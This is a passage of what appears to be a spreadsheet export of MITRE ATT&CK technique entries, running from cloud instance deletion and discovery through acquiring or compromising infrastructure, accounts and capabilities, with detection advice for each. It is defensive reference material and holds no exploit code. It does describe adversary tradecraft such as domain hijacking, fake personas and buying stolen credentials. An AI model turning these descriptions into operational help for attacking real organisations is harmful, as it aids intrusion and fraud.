An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>16 June 2020</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Revert Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request, or the &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). 
Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as &lt;code&gt;DescribeDBInstances&lt;/code&gt; to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>20 August 2020</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Isif Ibrahima; Praetorian; Regina Elwell</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>30 September 2020</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. 
Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure.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Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</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</si>
  <si>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t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Vinayak Wadhwa, Lucideus; Wes Hurd</t>
  </si>
  <si>
    <t>Acquire Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>01 October 2020</t>
  </si>
  <si>
    <t>15 April 2021</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a VPS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</si>
  <si>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Acquire Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <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</si>
  <si>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Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <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</si>
  <si>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Acquire Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/006</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</si>
  <si>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</si>
  <si>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Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584</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</si>
  <si>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Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure.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Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/001</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</si>
  <si>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</si>
  <si>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Compromise Infrastructure: DNS Server</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</si>
  <si>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Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign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</si>
  <si>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Compromise Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <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</si>
  <si>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Compromise Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/004</t>
  </si>
  <si>
    <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</si>
  <si>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Compromise Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>Once adversaries leverage the abused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</si>
  <si>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identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
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</si>
  <si>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Establish Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>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</si>
  <si>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Establish Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/002</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</si>
  <si>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</si>
  <si>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Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
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</si>
  <si>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Compromise Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently 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</si>
  <si>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Compromise Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587</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</si>
  <si>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Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Develop Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/001</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</si>
  <si>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post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Develop Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <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</si>
  <si>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Develop Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/003</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</si>
  <si>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[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Develop Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>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</si>
  <si>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Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service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Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
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Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Obtain Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <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Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Obtain Capabilities: Tool</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>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</si>
  <si>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Mnemonic AS; SOCCRATES</t>
  </si>
  <si>
    <t>Obtain Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/003</t>
  </si>
  <si>
    <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</si>
  <si>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Obtain Capabilities: Digital Certificates</t>
  </si>
  <si>
